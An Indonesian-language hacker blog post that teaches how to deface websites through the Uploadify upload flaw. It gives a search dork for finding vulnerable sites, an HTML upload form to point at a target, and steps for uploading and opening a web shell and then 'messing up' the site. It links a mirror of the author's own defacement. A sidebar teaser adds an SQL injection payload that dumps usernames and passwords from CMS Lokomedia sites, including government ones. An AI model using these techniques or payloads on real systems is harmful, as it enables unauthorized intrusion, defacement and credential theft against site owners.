DYCAL NOTES Tutorial Deface Teknik Uploadify Vulnerability Upload Shell



DYCAL NOTES

Tutorial Deface Teknik Uploadify Vulnerability Upload Shell
Ini memang metode deface lama, tapi masih banyak kok yang pakai teknik ini :). Simak aja Tutorialnya

Bahan-Bahan :
PC/Laptop
Koneksi Internet
CSRF
Dork
Shell (kalo blm punya cari di gugel)
Dork : inurl:/uploadify/ intitle:index of    (bisa di kembangkan lagi)

CSRF :
<form method="post" action="urltarget">
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Tusbol">
</form>
Atau CSRF online di http://mouncyler-community.hol.es/expl/ lalu kalian pilih Filedata

Tutorial :
1. Copy CSRF di atas lalu save dengan format .html

2. Dorking

3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank)

4. Edit CSRF yg tadi dah di save, masukan url target ke bagian action="urltarget" lalu save lg (format tetap html)

5. Buka file CSRF tadi, pilih file yang mau kalian uoload (terserah mau shell/script)

6. Jika Vuln hasilnya akan ada nama/url file kalian. Contoh /shell.php

7. Nah untuk akses shell nya, silahkan kalian copy nama/url file kalian lalu taruh di belakang alamat web target. Contoh : www.site-target.co.li/shell.php

8. Silahkan kalian acak2 website nya, tapi jika web Indonesia mohon jangan di rusak, jika ingin tebas index, backup dlu index nya

Lihat hasil deface saya di sini :
https://defacer.id/104636.html
Saya cuma bisa kasih liat mirror karna sekarang web nya sudah sembuh

Mohon maaf bila ada kekurangan/kesalahan, maklumi lah saya hanya newbie yang fakir ilmu

Komentar

Posting Komentar

Postingan populer dari blog ini

DYCAL NOTES Warga Memadati Sekitar Lokasi Bom Bunuh Diri Kampung Melayu

Gambar
Warga Memadati Sekitar Lokasi Bom Bunuh Diri Kampung Melayu DYC4L N0TES Lokasi ledakan dugaan bom bunuh diri di Halte Transjakarta Kampung Melayu, Jakarta Timur sudah dipasangi garis polisi. Sejumlah personel polisi pun telah berada di lokasi. Garis pembatas lokasi ledakan terpasang melintang sepanjang jalur khusus Transjakarta. Tampak di halte yang sudah berlubang akibat ledakan sudah dipenuhi polisi. Mereka terpantau tengah beraktivitas di dalam halte. Sedangkan warga terlihat memenuhi sekitar kawasan terjadinya ledakan. Beberapa pengguna jalan bahkan sampai memarkirkan kendaraannya untuk melihat tempat itu. Situasi lalu lintas di dekat lokasi tampak macet. Selain menghalau warga agar tidak semakin mendekat, arus lalu lintas juga coba diurai polisi.
Baca selengkapnya

DYCAL NOTES Tutorial Deface SQLi CMS Lokomedia

Gambar
DYCAL NOTES ⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇ Tutorial Deface SQLi CMS Lokomedia Add Facebook Me Facebook.com/Mr.Cyrus404 Berbicara soal teknik SQLi CMS Lokomedia ini, pasti sudah kesohor di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini. Ga usah panjang lebar langsung ke topik pembahasan yaitu "Tutorial Deface SQLi CMS Lokomedia" Bahan : 1. Dork : inurl:statis-1-profil.html inurl:statis-2-profil.html inurl:statis-3-strukturorganisasi.html Note : tambahkan site:org site:net :site:go.id site:ac.id site:id (Use Your Brain) 2. Exploit SQLi (SQL Injection) : 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Bingung cara ngexploit nya ?? sini di kasih tau :v contoh : http://sitepemerintah.co.li/statis-2-profil.html kamu tambahin exploit nya sesudah angka jadi kaya gini : http://sitepemerintah.co.li/statis-2'unio...
Baca selengkapnya